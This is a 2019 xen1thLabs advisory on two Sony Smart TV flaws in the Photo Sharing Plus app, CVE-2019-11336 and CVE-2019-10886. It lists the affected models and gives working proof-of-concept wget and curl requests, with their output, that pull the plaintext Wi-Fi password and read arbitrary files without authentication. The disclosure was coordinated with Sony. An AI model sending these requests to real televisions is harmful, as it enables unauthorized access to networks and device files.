23 Apr 19

Security flaws uncovered in Sony Smart TVs

SonyTV_vulnerability

Over the last decades, basic televisions have evolved with the integration of internet services and applications becoming similar to smartphones. With the advent of smart TVs, a high interest from the information security community has emerged. The vulnerabilities exist not only in homes but also in companies and organisations where smart TVs are used in conference and meeting rooms. Multiple vulnerabilities have been uncovered like information leakage, resulting in privacy issues or embedded applications issues.

xen1thLabs has implemented a test environment in order to assess the security level of Smart TVs.  Based on open source tools, namely gr-dvbt (https://github.com/BogdanDIA/gr-dvbt) and a ready usable Hybrid Broadband Broadcast TV (HbbTV) test suite (https://github.com/mitxp/HbbTV-Testsuite) and a software-defined radio, a testbed has been implemented in order to serve HbbTV applications to Smart TVs. The testbed and the implemented test applications have been presented during HiTB 2018 in the talk: “Hacking into Broadband and Broadcast TV Systems” (https://conference.hitb.org/hitbsecconf2018dxb/sessions/hacking-into-broadband-and-broadcast-tv-systems/).

Our security researchers have found two vulnerabilities in Sony products in October 2018 while auditing the security of Smart TVs. xen1thLabs coordinated the disclosure of these vulnerabilities with Sony. The “Photo Sharing Plus” application running inside the Smart TV contains several weaknesses. This application allows uploading pictures from Smartphone to the TVs, in order to display them on a large screen. When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point and shows a Wi-Fi password allowing customers to connect and share their media content on the Sony Smart TVs.

The first vulnerability allows an attacker - without authentication from the LAN/Wi-Fi - to retrieve the Wi-Fi password created by the television when the Photo Sharing Plus application is started.

The second vulnerability allows an attacker to read arbitrary files located in the TV without authentication including valuable files.

The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016.

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E.

It is important to note that the list is not complete and recent models are also affected.

 

CVE-2019-11336 - Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password from the “Photo Sharing Plus” API.

After starting the application, getting the wireless password created by the TV from the LAN (ip of the TV is 192.168.1.102), without authentication:

 

root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/

 

{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}

 

The password is 8362tbwX.

By reading logs in the TV, we can confirm the password has been delivered over HTTP, without authentication. The logs contain password in plain-text:

 

01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}

CVE-2019-10886 - Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

This vulnerability allows an attacker to retrieve internal files located inside the TV file system, without authentication.

By default, images used by the Photo Sharing Plus application are stored inside ‘/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/’. The application initiates an access point on the television and a HTTP daemon is listening to a TCP port on the newly created WLAN. Furthermore, this daemon also listens on the LAN side of the television and it is possible to retrieve these images from the LAN an image using this URL:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing to the web address http://[ip_tv]:10000/contentshare/image/ allows access to the root directory of the television running Android. 

By exploiting this vulnerability, ‘/default.prop’ (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop

 

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop

Trying 192.168.1.102...

TCP_NODELAY set

Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)

> GET /contentshare/image/default.prop HTTP/1.1

> Host: 192.168.1.102:10000

> User-Agent: curl/7.58.0

> Accept: /

< HTTP/1.1 200 OK

< Connection: close

< Content-Length: 591

< Content-Type: application/octet-stream

#

# ADDITIONAL_DEFAULT_PROPERTIES

#

ro.secure=1

security.perf_harden=1

ro.allow.mock.location=0

ro.debuggable=0 ro.zygote=zygote32

dalvik.vm.image-dex2oat-Xms=64m

dalvik.vm.image-dex2oat-Xmx=64m

dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m

ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0

#

# BOOTIMAGE_BUILD_PROPERTIES

#

ro.bootimage.build.date=2016年 11月 14日 月曜日 15:34:56 JST ro.bootimage.build.date.utc=1479105296 ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none

 

Closing connection 0

root@kali:~#

 

Device logs confirm the ‘/default.prop’ file has been delivered over HTTP:

 

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.

Impact

It is possible, without authentication, to read arbitrary files and to disclose wireless password.

 

Conclusion

The implemented testbed has shown to be efficient in finding vulnerabilities in Smart TVs. Multiple vulnerabilities were found i.e. known public vulnerabilities in outdated software and unknown vulnerabilities as well as new attack scenarios. The multiple vulnerabilities uncovered in Smart TVs by previous security assessments and in this vulnerability research output shows clearly that you need to be careful with Smart TVs in critical environments as HbbTV represents a significant attack vector. We suggest the HbbTV should deactivated through a strict policy (confidence in the software deactivation remains questionable) as Smart TVs are normally only used for presentations in meeting rooms. Moreover, as any IT asset, Smart TVs should have the latest security patches.

xen1thLabs would like to thank Sony PSIRT team for their responsible cooperation in fixing these vulnerabilities.

 


By xen1thLabs
  Back To Blog Listing